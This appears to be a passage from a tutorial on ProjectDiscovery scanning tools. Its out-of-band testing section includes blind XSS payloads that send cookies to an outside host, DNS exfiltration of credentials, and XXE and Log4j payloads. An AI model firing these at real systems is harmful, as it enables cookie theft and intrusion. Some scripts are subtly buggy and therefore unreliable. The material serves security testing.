echo "https://example.com" | tlsx -cert -chain
# Certificate expiry
echo "https://example.com" | tlsx -cert -expiry
Security Assessment
# Vulnerability scanning
echo "https://example.com" | tlsx -vulns
# Protocol version testing
echo "https://example.com" | tlsx -tls-version
# JARM fingerprinting
echo "https://example.com" | tlsx -jarm
Real-World Scenarios
Scenario 1: Enterprise Certificate Management
# Target: Large corporation
# Objective: Audit SSL/TLS certificates across infrastructure
# Step 1: Discover HTTPS services
cat corporate_domains.txt | httpx -silent -https | tee https_services.txt
# Step 2: Certificate inventory
cat https_services.txt | tlsx -cert -cert-info -json > certificate_inventory.json
# Step 3: Identify expiring certificates
jq -r '.[] | select(.cert_expiry != null) | [.host, .cert_expiry] | @csv' certificate_inventory.json | \
while IFS=, read host expiry; do
expiry_date=$(date -d "$expiry" +%s)
current_date=$(date +%s)
days_until_expiry=$(( (expiry_date - current_date) / 86400 ))
if [ $days_until_expiry -lt 30 ]; then
echo "$host expires in $days_until_expiry days ($expiry)"
fi
done
# Step 4: Certificate authority analysis
jq -r '.[] | .cert_issuer' certificate_inventory.json | sort | uniq -c | sort -nr
Scenario 2: Security Configuration Assessment
# Target: Financial services company
# Objective: Assess TLS security across all services
# TLS version compliance check
cat financial_services.txt | tlsx -tls-version -json | \
jq -r '.[] | select(.tls_version != null) | [.host, .tls_version] | @csv' | \
grep -v "1.2\|1.3" > weak_tls_versions.csv
# Cipher suite security analysis
cat financial_services.txt | tlsx -cipher -json > cipher_analysis.json
jq -r '.[] | select(.cipher != null) | [.host, .cipher] | @csv' cipher_analysis.json | \
grep -E "(RC4|DES|MD5|SHA1)" > weak_ciphers.csv
# Certificate validation issues
cat financial_services.txt | tlsx -cert -json | \
jq -r '.[] | select(.cert_error != null) | [.host, .cert_error] | @csv'
# HSTS implementation check
cat financial_services.txt | httpx -response-headers -json | \
jq -r '.[] | select(.headers["strict-transport-security"] == null) | .url' > missing_hsts.txt
Scenario 3: Threat Hunting and Attribution
# Target: Suspicious infrastructure
# Objective: Use TLS fingerprinting for threat attribution
# JARM fingerprinting for infrastructure correlation
cat suspicious_ips.txt | tlsx -jarm -json > jarm_fingerprints.json
# Group by JARM fingerprint
jq -r '.[] | [.jarm, .host] | @csv' jarm_fingerprints.json | \
sort | awk -F, '{print $1}' | uniq -c | sort -nr
# Certificate analysis for infrastructure links
cat suspicious_ips.txt | tlsx -cert -cert-info -json | \
jq -r '.[] | [.host, .cert_issuer, .cert_subject] | @csv' > certificate_attribution.csv
# Identify shared certificates
cut -d, -f2,3 certificate_attribution.csv | sort | uniq -c | sort -nr | head -20
Advanced Techniques
Custom Certificate Validation
# Check for specific certificate authorities
cat domains.txt | tlsx -cert -json | \
jq -r '.[] | select(.cert_issuer | contains("Let'\''s Encrypt")) | .host'
# Wildcard certificate detection
cat domains.txt | tlsx -cert -json | \
jq -r '.[] | select(.cert_subject | contains("*")) | [.host, .cert_subject] | @csv'
Performance and Monitoring
# TLS handshake timing
cat critical_services.txt | tlsx -json | \
jq -r '.[] | [.host, .tls_handshake_time] | @csv'
# Continuous monitoring script
#!/bin/bash
while true; do
DATE=$(date +%Y%m%d_%H%M%S)
cat critical_services.txt | tlsx -cert -expiry -json > "tls_monitor_$DATE.json"
sleep 3600
done
Integration with Security Tools
# TLSx + Nuclei for TLS vulnerability scanning
cat https_services.txt | tlsx -json | \
jq -r '.host' | nuclei -t ssl/
# TLSx + Custom analysis
cat domains.txt | tlsx -cert -json | \
jq -r '.[] | select(.cert_expired == true) | .host' | \
httpx -title -status-code
Detection Tools
13. Nuclei - Vulnerability Scanner
Overview
Nuclei is a fast vulnerability scanner based on YAML templates, capable of scanning for thousands of different security issues.
Installation
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# Update templates
nuclei -update-templates
Basic Usage
# Basic scan
nuclei -u https://example.com
# Scan with specific templates
nuclei -u https://example.com -t cves/
# Scan from file
nuclei -list urls.txt
# Severity filtering
nuclei -u https://example.com -severity high,critical
Template Categories
# CVE scanning
nuclei -u https://example.com -t cves/
# Technology detection
nuclei -u https://example.com -t technologies/
# Misconfiguration detection
nuclei -u https://example.com -t misconfiguration/
# Exposed panels
nuclei -u https://example.com -t exposed-panels/
# Default credentials
nuclei -u https://example.com -t default-logins/
Real-World Scenarios
Scenario 1: Comprehensive Security Assessment
# Target: E-commerce platform
# Objective: Complete vulnerability assessment
# Step 1: Discovery and enumeration
subfinder -d ecommerce.com -silent | httpx -silent > ecommerce_targets.txt
# Step 2: Technology identification
nuclei -list ecommerce_targets.txt -t technologies/ -json > tech_stack.json
# Step 3: CVE scanning based on identified technologies
jq -r '.["template-id"]' tech_stack.json | sort -u > detected_techs.txt
nuclei -list ecommerce_targets.txt -t cves/ -tags "$(tr '\n' ',' < detected_techs.txt)" -json > cve_results.json
# Step 4: Configuration and exposure checks
nuclei -list ecommerce_targets.txt -t exposures/ -t misconfiguration/ -severity medium,high,critical -json > config_issues.json
# Step 5: Generate comprehensive report
jq -r '[.host, .["template-id"], .info.severity, .info.name] | @csv' cve_results.json config_issues.json > vulnerability_report.csv
Scenario 2: Continuous Security Monitoring
# Target: Critical infrastructure
# Objective: 24/7 vulnerability monitoring
#!/bin/bash
# Script: continuous_nuclei_monitor.sh
TARGETS_FILE="critical_assets.txt"
ALERT_WEBHOOK="https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
while true; do
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
# Scan for high/critical vulnerabilities
nuclei -list $TARGETS_FILE -severity high,critical -json -o "scan_$TIMESTAMP.json"
# Check for new vulnerabilities
if [ -s "scan_$TIMESTAMP.json" ]; then
# Send alert
jq -r '.info.name + " - " + .host' "scan_$TIMESTAMP.json" | \
while read vuln; do
curl -X POST -H 'Content-type: application/json' \
--data '{"text":"🚨 Critical Vulnerability Found: '$vuln'"}' \
$ALERT_WEBHOOK
done
fi
sleep 3600 # Wait 1 hour
done
Scenario 3: Supply Chain Security Assessment
# Target: Software vendor and dependencies
# Objective: Assess third-party security risks
# Vendor's main infrastructure
nuclei -u https://vendor.com -t cves/ -t exposures/ -json > vendor_main.json
# Customer-facing applications
cat vendor_customer_portals.txt | nuclei -t default-logins/ -t exposures/ -json > customer_portals.json
# API security assessment
cat vendor_apis.txt | nuclei -t exposures/apis/ -t misconfiguration/ -json > api_security.json
# Development infrastructure
echo -e "dev\ntest\nstaging\nbeta" | while read env; do
echo "https://$env.vendor.com"
done | nuclei -t exposures/ -t misconfiguration/ -json > dev_infrastructure.json
# Consolidate findings
jq -s 'add' vendor_main.json customer_portals.json api_security.json dev_infrastructure.json > complete_vendor_assessment.json
Advanced Template Usage
Custom Template Creation
# custom-login-check.yaml
id: custom-login-check
info:
name: Custom Login Panel Detection
author: security-team
severity: info
tags: panel,login
requests:
- method: GET
path:
- "{{BaseURL}}/admin"
- "{{BaseURL}}/login"
- "{{BaseURL}}/administrator"
matchers-condition: and
matchers:
- type: word
words:
- "login"
- "password"
- "username"
condition: or
- type: status
status:
- 200
Template Filtering and Optimization
# Run only specific template types
nuclei -u https://target.com -type http -severity critical
# Exclude certain templates
nuclei -u https://target.com -exclude-templates cves/2018/
# Custom template directory
nuclei -u https://target.com -t /custom/templates/
# Rate limiting for stealth
nuclei -u https://target.com -rate-limit 10 -bulk-size 5
Advanced Output and Reporting
# Multiple output formats
nuclei -list targets.txt -json -o results.json -markdown -o report.md
# Custom field extraction
nuclei -list targets.txt -json | jq -r '.[] | [.host, .["template-id"], .info.severity, .matched-at] | @csv'
# Integration with external tools
nuclei -list targets.txt -json | jq -r '.host' | sort -u | httpx -title -tech-detect
14. Interactsh - Out-of-Band Interaction Server
Overview
Interactsh is an out-of-band (OOB) interaction gathering server for detecting vulnerabilities that require external interaction.
Installation
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest
Basic Usage
# Start interaction server
interactsh-client
# Custom server
interactsh-client -server https://custom.interactsh.com
# Poll for interactions
interactsh-client -poll -server https://oast.pro
Self-Hosted Server Setup
# Install server
interactsh-server -domain interactsh.example.com
# With authentication
interactsh-server -domain interactsh.example.com -token secret_token
# HTTPS configuration
interactsh-server -domain interactsh.example.com -cert cert.pem -key key.pem
Real-World Scenarios
Scenario 1: SSRF Detection in Web Applications
# Target: Web application with user input
# Objective: Detect Server-Side Request Forgery
# Start interaction client
interactsh-client -json -o ssrf_interactions.json &
INTERACTSH_PID=$!
# Get the generated subdomain
INTERACTSH_URL=$(curl -s https://oast.pro/register | jq -r '.domain')
# Test SSRF in various parameters
curl -X POST "https://webapp.com/profile" \
-d "website=http://$INTERACTSH_URL" \
-d "avatar_url=http://$INTERACTSH_URL/avatar.jpg"
curl -X POST "https://webapp.com/import" \
-d "url=http://$INTERACTSH_URL/data.xml"
# Wait for interactions
sleep 60
# Check for received interactions
curl -s "https://oast.pro/interactions" | jq -r '.[] | [.remote_address, .raw_request] | @csv'
kill $INTERACTSH_PID
Scenario 2: Blind XSS Detection
# Target: Contact forms and user input fields
# Objective: Detect blind XSS vulnerabilities
# Generate XSS payloads with interaction URLs
INTERACTSH_URL=$(interactsh-client -domain oast.pro | head -1)
# XSS payloads
cat > xss_payloads.txt << EOF
<script>fetch('http://$INTERACTSH_URL/xss?cookie='+document.cookie)</script>
<img src="x" onerror="fetch('http://$INTERACTSH_URL/xss?location='+window.location)">
<svg onload="fetch('http://$INTERACTSH_URL/xss?dom='+document.documentElement.outerHTML.substring(0,1000))">
EOF
# Submit payloads to contact forms
while read payload; do
curl -X POST "https://company.com/contact" \
-d "name=Test" \
-d "email=test@test.com" \
-d "message=$payload"
sleep 5
done < xss_payloads.txt
# Monitor for interactions
interactsh-client -poll -json | jq -r '.[] | select(.protocol == "http") | .raw_request'
Scenario 3: DNS Exfiltration and Detection
# Target: Corporate network
# Objective: Test data exfiltration capabilities
# Start DNS interaction monitoring
interactsh-client -json -poll &
# Simulate data exfiltration
EXFIL_DOMAIN=$(interactsh-client -domain oast.pro | head -1)
# Test DNS exfiltration methods
echo "sensitive-data-12345" | xxd -p | tr -d '\n' | \
while read hex; do
nslookup "$hex.$EXFIL_DOMAIN"
done
# Base64 encoded exfiltration
echo "admin:password123" | base64 | tr -d '\n' | \
while read b64; do
nslookup "$b64.$EXFIL_DOMAIN"
done
# Monitor received DNS queries
curl -s "https://oast.pro/interactions" | \
jq -r '.[] | select(.protocol == "dns") | .raw_request' | \
grep -oP '(?<=\s)[a-f0-9]+(?=\.)'
Advanced Integration
Nuclei Integration
# Use Interactsh with Nuclei for OOB testing
nuclei -u https://target.com -interactsh-url https://oast.pro -t oob/
# Custom OOB templates
cat > oob-ssrf.yaml << EOF
id: oob-ssrf-test
info:
name: Out-of-band SSRF Test
severity: high
variables:
oob_domain: "{{interactsh-url}}"
requests:
- method: POST
path:
- "{{BaseURL}}/webhook"
body: 'url=http://{{oob_domain}}'
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
EOF
nuclei -u https://target.com -t oob-ssrf.yaml -interactsh-url https://oast.pro
Custom Payloads and Automation
#!/bin/bash
# Script: automated_oob_testing.sh
TARGET_LIST="targets.txt"
INTERACTSH_SERVER="https://oast.pro"
# Start interaction monitoring
interactsh-client -server $INTERACTSH_SERVER -json -o interactions.json &
MONITOR_PID=$!
# Generate unique interaction domain
INTERACTION_DOMAIN=$(curl -s "$INTERACTSH_SERVER/register" | jq -r '.domain')
# Test various OOB vectors
while read target; do
echo "Testing $target"
# SSRF tests
curl -s "$target/api/fetch" -d "url=http://$INTERACTION_DOMAIN/ssrf" 2>/dev/null
# XML External Entity
curl -s "$target/api/xml" -H "Content-Type: application/xml" \
-d "<?xml version='1.0'?><!DOCTYPE root [<!ENTITY xxe SYSTEM 'http://$INTERACTION_DOMAIN/xxe'>]><root>&xxe;</root>" 2>/dev/null
# Log4j style payloads
curl -s "$target/" -H "User-Agent: \${jndi:ldap://$INTERACTION_DOMAIN/log4j}" 2>/dev/null
sleep 2
done < $TARGET_LIST
# Wait for interactions
sleep 30
# Analyze results
jq -r '.[] | [.timestamp, .protocol, .remote_address, .unique_id] | @csv' interactions.json
kill $MONITOR_PID
15. CVEMap - CVE Intelligence Tool
Overview
CVEMap provides a structured interface to navigate Common Vulnerabilities and Exposures (CVE) data with advanced filtering and analysis capabilities.
Installation
go install -v github.com/projectdiscovery/cvemap/cmd/cvemap@latest
Basic Usage
# List recent CVEs
cvemap -limit 10
# Search by vendor
cvemap -vendor microsoft
# Search by product
cvemap -product windows
# Filter by severity
cvemap -severity critical
Advanced Filtering
# CVSS score filtering
cvemap -cvss-score ">8.0"
# EPSS score filtering
cvemap -epss-score ">0.5"
# Age-based filtering
cvemap -age 7 # Last 7 days
# Combined filters
cvemap -vendor apache -severity high -age 30
Real-World Scenarios
Scenario 1: Threat Intelligence and Vulnerability Management
# Target: Enterprise security team
# Objective: Daily threat intelligence gathering
#!/bin/bash
# Script: daily_cve_intelligence.sh
DATE=$(date +%Y%m%d)
REPORT_FILE="cve_intelligence_$DATE.txt"
echo "=== Daily CVE Intelligence Report - $DATE ===" > $REPORT_FILE
echo "" >> $REPORT_FILE
# High-priority vendors for the organization
VENDORS=("microsoft" "apache" "nginx" "openssh" "linux")
for vendor in "${VENDORS[@]}"; do
echo "=== $vendor CVEs (Last 7 days) ===" >> $REPORT_FILE
cvemap -vendor "$vendor" -age 7 -severity high,critical -json | \
jq -r '.[] | [.cve_id, .cvss_score, .epss_score, .cve_description] | @csv' >> $REPORT_FILE
echo "" >> $REPORT_FILE
done
# Trending vulnerabilities with high EPSS scores
echo "=== High EPSS Score CVEs (Active Exploitation Likely) ===" >> $REPORT_FILE
cvemap -epss-score ">0.7" -age 30 -json | \
jq -r '.[] | [.cve_id, .epss_score, .cvss_score, .cve_description] | @csv' >> $REPORT_FILE
# Send report to security team
mail -s "Daily CVE Intelligence Report" security-team@company.com < $REPORT_FILE
Scenario 2: Asset-Specific Vulnerability Assessment
# Target: Infrastructure inventory
# Objective: Match CVEs to specific assets
# Extract technology stack from asset inventory
cat asset_inventory.csv | cut -d',' -f3 | sort -u > tech_stack.txt
# Check CVEs for each technology
while read technology; do
echo "=== CVEs for $technology ==="
# Extract vendor and product
vendor=$(echo $technology | cut -d' ' -f1)
product=$(echo $technology | cut -d' ' -f2-)
# Search for relevant CVEs
cvemap -vendor "$vendor" -product "$product" -age 365 -severity medium,high,critical -json | \
jq -r '.[] | [.cve_id, .cvss_score, .cve_description] | @csv' > "${technology}_cves.csv"
# Count critical issues
critical_count=$(jq -r '.[] | select(.cvss_score >= 9.0) | .cve_id' "${technology}_cves.json" 2>/dev/null | wc -l)
echo "Critical CVEs found: $critical_count"
done < tech_stack.txt
Scenario 3: Penetration Testing CVE Research
# Target: Penetration testing engagement
# Objective: Identify exploitable vulnerabilities for discovered services
# Service discovery results from reconnaissance
cat discovered_services.txt | while read service; do
# Parse service information
host=$(echo $service | cut -d',' -f1)
port=$(echo $service | cut -d',' -f2)
service_name=$(echo $service | cut -d',' -f3)
version=$(echo $service | cut -d',' -f4)
echo "Researching CVEs for $service_name $version on $host:$port"
# Search for CVEs with PoC availability
cvemap -product "$service_name" -json | \
jq -r --arg version "$version" '.[] | select(.affected_versions | contains($version)) |
select(.has_poc == true or .exploitdb_id != null) |
[.cve_id, .cvss_score, .exploitdb_id, .cve_description] | @csv' > "${host}_${port}_exploitable_cves.csv"
# Prioritize by exploitability
sort -t',' -k2 -nr "${host}_${port}_exploitable_cves.csv" | head -5
done
# Generate penetration testing target list
find . -name "*_exploitable_cves.csv" -exec cat {} \; | \
sort -t',' -k2 -nr | head -20 > priority_targets.csv
Integration with Security Tools
CVEMap + Nuclei Integration
# Research CVEs for a specific product
cvemap -product "wordpress" -severity high -json > wordpress_cves.json
# Extract CVE IDs
jq -r '.[] | .cve_id' wordpress_cves.json > wordpress_cve_ids.txt
# Scan with Nuclei using CVE-specific templates
cat wordpress_cve_ids.txt | while read cve; do
nuclei -u https://target-wordpress.com -t "cves/$cve" 2>/dev/null
done
Automated Vulnerability Correlation
#!/bin/bash
# Script: correlate_vulnerabilities.sh
TARGET_DOMAIN=$1
# Technology detection
httpx -u "https://$TARGET_DOMAIN" -tech-detect -json > tech_detection.json
# Extract technologies
jq -r '.tech[]?' tech_detection.json | while read tech; do
vendor=$(echo $tech | cut -d'/' -f1)
product=$(echo $tech | cut -d'/' -f2)
# Research recent high-impact CVEs
cvemap -vendor "$vendor" -product "$product" -age 90 -severity high,critical -json > "${tech}_cves.json"
# Check if Nuclei templates exist
template_count=$(find $HOME/nuclei-templates -name "*${cve}*" 2>/dev/null | wc -l)
if [ $template_count -gt 0 ]; then
echo "$tech has $template_count Nuclei templates available"
# Add to priority scan list
echo "$tech" >> priority_scan_targets.txt
fi
done
16. Notify - Multi-Platform Notification Tool
Overview
Notify streams output from security tools to multiple platforms including Slack, Discord, Telegram, and custom webhooks.
Installation
go install -v github.com/projectdiscovery/notify/cmd/notify@latest
Configuration
# ~/.config/notify/provider-config.yaml
slack:
- webhook_url: "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
username: "SecurityBot"
channel: "#security-alerts"
discord:
- webhook_url: "https://discord.com/api/webhooks/YOUR/WEBHOOK"
username: "SecurityBot"
telegram:
- bot_token: "YOUR_BOT_TOKEN"
chat_id: "YOUR_CHAT_ID"
email:
- smtp_server: "smtp.gmail.com"
smtp_port: 587
username: "alerts@company.com"
password: "app_password"
to: ["security-team@company.com"]
custom:
- webhook_url: "https://api.company.com/security-alerts"
headers:
Authorization: "Bearer YOUR_TOKEN"
Basic Usage
# Send to Slack
echo "Security alert: High severity vulnerability found" | notify -provider slack
# Send to multiple providers
echo "Critical finding detected" | notify -provider slack,discord,email
# Pipe from other tools
nuclei -u https://target.com -severity critical | notify -provider slack
Real-World Scenarios
Scenario 1: Real-Time Security Monitoring
# Target: Production infrastructure
# Objective: Immediate alerting for critical findings
#!/bin/bash
# Script: realtime_security_monitor.sh
TARGETS_FILE="production_assets.txt"
SLACK_CHANNEL="#security-incidents"
# Continuous monitoring loop
while true; do
TIMESTAMP=$(date '+%Y-%m-%d %H:%M:%S')
# High-severity vulnerability scanning
nuclei -list $TARGETS_FILE -severity critical -json | \
while read -r result; do
CVE=$(echo "$result" | jq -r '.["template-id"]')
HOST=$(echo "$result" | jq -r '.host')
SEVERITY=$(echo "$result" | jq -r '.info.severity')
NAME=$(echo "$result" | jq -r '.info.name')
# Format alert message
ALERT="🚨 *CRITICAL VULNERABILITY DETECTED* 🚨
*Time:* $TIMESTAMP
*Target:* $HOST
*Vulnerability:* $NAME
*Template:* $CVE
*Severity:* $SEVERITY
*Action Required:* Immediate investigation and remediation"
# Send to multiple channels
echo "$ALERT" | notify -provider slack -slack-channel "$SLACK_CHANNEL"
echo "$ALERT" | notify -provider discord
echo "$ALERT" | notify -provider email
# Log to file
echo "$TIMESTAMP,$HOST,$CVE,$SEVERITY,$NAME" >> critical_vulnerabilities.log
done
# Check for new exposed services
naabu -list $TARGETS_FILE -top-ports 100 -json | \
jq -r 'select(.port != null) | [.host, .port] | @csv' | \
while IFS=, read host port; do
# Check if this is a new service
if ! grep -q "$host:$port" known_services.txt; then
echo "$host:$port" >> known_services.txt
ALERT="🔍 *NEW SERVICE DETECTED* 🔍
*Host:* $host
*Port:* $port
*Time:* $TIMESTAMP
*Action:* Security assessment required"
echo "$ALERT" | notify -provider slack -slack-channel "#infrastructure-changes"
fi
done
sleep 300 # Wait 5 minutes
done
Scenario 2: Penetration Testing Workflow Integration
# Target: Penetration testing engagement
# Objective: Streamlined reporting and team coordination
#!/bin/bash
# Script: pentest_workflow.sh
TARGET_DOMAIN=$1
ENGAGEMENT_ID=$2
TEAM_CHANNEL="#pentest-${ENGAGEMENT_ID}"
# Initialize engagement
INIT_MESSAGE="🎯 *PENETRATION TEST INITIATED* 🎯
*Target:* $TARGET_DOMAIN
*Engagement ID:* $ENGAGEMENT_ID
*Start Time:* $(date)
*Team:* Penetration Testing Team"
echo "$INIT_MESSAGE" | notify -provider slack -slack-channel "$TEAM_CHANNEL"
# Phase 1: Reconnaissance
echo "📡 Starting reconnaissance phase..." | notify -provider slack -slack-channel "$TEAM_CHANNEL"
subfinder -d "$TARGET_DOMAIN" -silent | \
tee subdomains.txt | \
wc -l | \
xargs -I {} echo "Found {} subdomains for $TARGET_DOMAIN" | \
notify -provider slack -slack-channel "$TEAM_CHANNEL"
# Phase 2: Service discovery
echo "🔍 Starting service discovery..." | notify -provider slack -slack-channel "$TEAM_CHANNEL"
cat subdomains.txt | \
httpx -silent | \
tee live_hosts.txt | \
wc -l | \
xargs -I {} echo "Identified {} live web services" | \
notify -provider slack -slack-channel "$TEAM_CHANNEL"
# Phase 3: Vulnerability scanning
echo "🛡️ Starting vulnerability assessment..." | notify -provider slack -slack-channel "$TEAM_CHANNEL"
nuclei -list live_hosts.txt -severity medium,high,critical -json | \
while read -r vuln; do
TEMPLATE=$(echo "$vuln" | jq -r '.["template-id"]')
HOST=$(echo "$vuln" | jq -r '.host')
SEVERITY=$(echo "$vuln" | jq -r '.info.severity')
NAME=$(echo "$vuln" | jq -r '.info.name')
VULN_ALERT="🔓 *VULNERABILITY FOUND*
*Host:* $HOST
*Issue:* $NAME
*Severity:* $SEVERITY
*Template:* $TEMPLATE"
echo "$VULN_ALERT" | notify -provider slack -slack-channel "$TEAM_CHANNEL"
done
# Generate summary report
TOTAL_HOSTS=$(cat live_hosts.txt | wc -l)
CRITICAL_VULNS=$(grep '"severity":"critical"' nuclei_results.json | wc -l)
HIGH_VULNS=$(grep '"severity":"high"' nuclei_results.json | wc -l)
SUMMARY="📊 *PENETRATION TEST SUMMARY*
*Target:* $TARGET_DOMAIN
*Total Hosts:* $TOTAL_HOSTS
*Critical Vulnerabilities:* $CRITICAL_VULNS
*High Vulnerabilities:* $HIGH_VULNS
*Completion Time:* $(date)"
echo "$SUMMARY" | notify -provider slack,email -slack-channel "$TEAM_CHANNEL"
Scenario 3: Bug Bounty Automation
# Target: Bug bounty program
# Objective: Automated discovery and alerting
#!/bin/bash
# Script: bug_bounty_automation.sh
PROGRAM_NAME=$1
SCOPE_FILE="$PROGRAM_NAME.scope"
DISCORD_WEBHOOK="https://discord.com/api/webhooks/YOUR/WEBHOOK"
# Monitor for new assets
while true; do
# Asset discovery
cat "$SCOPE_FILE" | while read domain; do
subfinder -d "$domain" -silent | \
comm -13 "known_assets_$domain.txt" - > "new_assets_$domain.txt"
if [ -s "new_assets_$domain.txt" ]; then
NEW_COUNT=$(cat "new_assets_$domain.txt" | wc -l)
DISCOVERY_ALERT="🆕 *NEW ASSETS DISCOVERED* 🆕
*Program:* $PROGRAM_NAME
*Domain:* $domain
*New Assets:* $NEW_COUNT
*Assets:*
\`\`\`
$(cat "new_assets_$domain.txt")
\`\`\`"
echo "$DISCOVERY_ALERT" | notify -provider discord
# Quick vulnerability scan on new assets
cat "new_assets_$domain.txt" | \
httpx -silent | \
nuclei -t exposures/ -severity medium,high,critical | \
notify -provider discord -discord-username "BugBountyBot"
# Update known assets
cat "new_assets_$domain.txt" >> "known_assets_$domain.txt"
sort -u "known_assets_$domain.txt" -o "known_assets_$domain.txt"
fi
done
sleep 3600 # Check every hour
done
Advanced Integration Patterns
Custom Webhook Integration
# Custom API integration for ticketing systems
nuclei -u https://target.com -severity high,critical -json | \
jq -r '[.host, .["template-id"], .info.severity, .info.name] | @csv' | \
while IFS=, read host template severity name; do
# Create JIRA ticket
curl -X POST "https://company.atlassian.net/rest/api/2/issue" \
-H "Content-Type: application/json" \
-u "user@company.com:api_token" \
-d "{
\"fields\": {
\"project\": {\"key\": \"SEC\"},
\"summary\": \"$severity: $name\",
\"description\": \"Host: $host\\nTemplate: $template\",
\"issuetype\": {\"name\": \"Bug\"}
}
}"
done
Multi-Stage Notification Workflows
# Escalation workflow based on severity
echo "Critical vulnerability found" | \
notify -provider slack -slack-channel "#security-team" && \
notify -provider email -email-to "security-manager@company.com" && \
notify -provider custom -webhook-url "https://api.pagerduty.com/incidents"
Utility Tools
17. PDTM - ProjectDiscovery Tool Manager
Overview
PDTM (ProjectDiscovery Tool Manager) simplifies the installation and management of all ProjectDiscovery tools.
Installation
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest
Basic Usage
# List available tools
pdtm list
# Install all tools
pdtm install-all
# Install specific tool
pdtm install nuclei
# Update all tools
pdtm update-all
# Remove tool
pdtm remove httpx
Real-World Scenarios
Scenario 1: Security Team Workstation Setup
#!/bin/bash
# Script: security_workstation_setup.sh
echo "Setting up ProjectDiscovery security toolkit..."
# Install PDTM
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest
# Install all ProjectDiscovery tools
pdtm install-all
# Verify installations
pdtm list | grep -E "(nuclei|subfinder|httpx|naabu|katana)"
# Update Nuclei templates
nuclei -update-templates
# Create directory structure
mkdir -p ~/security/{wordlists,results,scripts,reports}
# Download common wordlists
cd ~/security/wordlists
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-110000.txt
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/directory-list-2.3-medium.txt
echo "Security workstation setup complete!"
Scenario 2: Automated Tool Management
#!/bin/bash
# Script: daily_tool_maintenance.sh
LOG_FILE="/var/log/pdtm_maintenance.log"
DATE=$(date '+%Y-%m-%d %H:%M:%S')
echo "[$DATE] Starting daily tool maintenance" >> $LOG_FILE
# Check for updates
pdtm list | while read tool status; do
if [[ $status == *"outdated"* ]]; then
echo "[$DATE] Updating $tool" >> $LOG_FILE
pdtm update "$tool" 2>> $LOG_FILE
fi
done
# Update Nuclei templates
nuclei -update-templates -silent 2>> $LOG_FILE
# Verify tools are working
TOOLS=("nuclei" "subfinder" "httpx" "naabu" "katana")
for tool in "${TOOLS[@]}"; do
if command -v "$tool" &> /dev/null; then
echo "[$DATE] $tool: OK" >> $LOG_FILE
else
echo "[$DATE] $tool: MISSING - Reinstalling" >> $LOG_FILE
pdtm install "$tool" 2>> $LOG_FILE
fi
done
echo "[$DATE] Tool maintenance completed" >> $LOG_FILE
18. MapCIDR - CIDR Manipulation Utility
Overview
MapCIDR performs various operations on CIDR ranges including expansion, aggregation, and manipulation.
Installation
go install -v github.com/projectdiscovery/mapcidr/cmd/mapcidr@latest
Basic Usage
# Expand CIDR to IPs
echo "192.168.1.0/24" | mapcidr
# Count IPs in CIDR
echo "10.0.0.0/8" | mapcidr -count
# Aggregate CIDRs
cat cidrs.txt | mapcidr -aggregate
# Slice CIDR
echo "192.168.0.0/16" | mapcidr -slice-size 256
Real-World Scenarios
Scenario 1: Network Security Assessment
# Target: Corporate network ranges
# Objective: Systematic security assessment
# Define corporate IP ranges
cat > corporate_ranges.txt << EOF
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
203.0.113.0/24
EOF
# Count total IPs
cat corporate_ranges.txt | mapcidr -count
# Output: Total IPs: 16,909,056
# Break into manageable chunks for scanning
cat corporate_ranges.txt | mapcidr -slice-size 1024 > scanning_chunks.txt
# Scan each chunk
cat scanning_chunks.txt | while read cidr; do
echo "Scanning $cidr"
naabu -cidr "$cidr" -top-ports 100 -o "scan_$(echo $cidr | tr '/' '_').txt"
done
Scenario 2: Cloud Infrastructure Mapping
# Target: Multi-cloud deployment
# Objective: Map and monitor cloud IP ranges
# AWS IP ranges
curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | \
jq -r '.prefixes[] | select(.service=="EC2") | .ip_prefix' | \
head -100 > aws_ranges.txt
# Process AWS ranges
cat aws_ranges.txt | mapcidr -aggregate > aws_aggregated.txt
# Identify overlapping ranges
mapcidr -cl aws_ranges.txt,azure_ranges.txt -overlap
# Monitor for changes
diff aws_ranges_previous.txt aws_ranges.txt | \
grep ">" | cut -c 3- | \
mapcidr -count
Scenario 3: Penetration Testing Scope Management
# Target: Penetration testing engagement
# Objective: Manage testing scope and exclusions
# Define testing scope
cat > in_scope.txt << EOF
192.168.1.0/24
10.0.1.0/24
172.16.1.0/24
EOF
# Define exclusions
cat > exclusions.txt << EOF
192.168.1.1
192.168.1.254
10.0.1.1
172.16.1.1
EOF
# Calculate actual testing targets
cat in_scope.txt | mapcidr > all_targets.txt
comm -23 all_targets.txt exclusions.txt > testing_targets.txt
# Verify scope size
echo "Total targets for testing: $(cat testing_targets.txt | wc -l)"
# Generate testing batches
split -l 100 testing_targets.txt batch_
for batch in batch_*; do
mv "$batch" "${batch}.txt"
done
19. CDNCheck - CDN and Technology Detection
Overview
CDNCheck detects CDN providers and various technologies for given DNS names or IP addresses.
Installation
go install -v github.com/projectdiscovery/cdncheck/cmd/cdncheck@latest
Basic Usage
# Check CDN for domain
echo "example.com" | cdncheck
# Check multiple domains
cat domains.txt | cdncheck
# JSON output
echo "example.com" | cdncheck -json
# Check specific IP
echo "1.2.3.4" | cdncheck
Real-World Scenarios
Scenario 1: Web Application Security Assessment
# Target: E-commerce platform
# Objective: Understand infrastructure and bypass restrictions
# Identify CDN usage
cat ecommerce_domains.txt | cdncheck -json > cdn_analysis.json
# Extract direct IP addresses
jq -r '.[] | select(.cdn == false) | .input' cdn_analysis.json > direct_ips.txt
# Identify CDN providers
jq -r '.[] | select(.cdn == true) | [.input, .provider] | @csv' cdn_analysis.json > cdn_providers.csv
# Find potential CDN bypass opportunities
cat direct_ips.txt | httpx -silent -title > direct_access_check.txt
# Test for origin server exposure
cat cdn_providers.csv | while IFS=, read domain provider; do
# Common origin server patterns
for subdomain in origin direct admin; do
echo "$subdomain.$domain" | cdncheck
done
done
Scenario 2: Infrastructure Intelligence Gathering
# Target: Competitor analysis
# Objective: Understand technology stack and hosting choices
# Analyze competitor domains
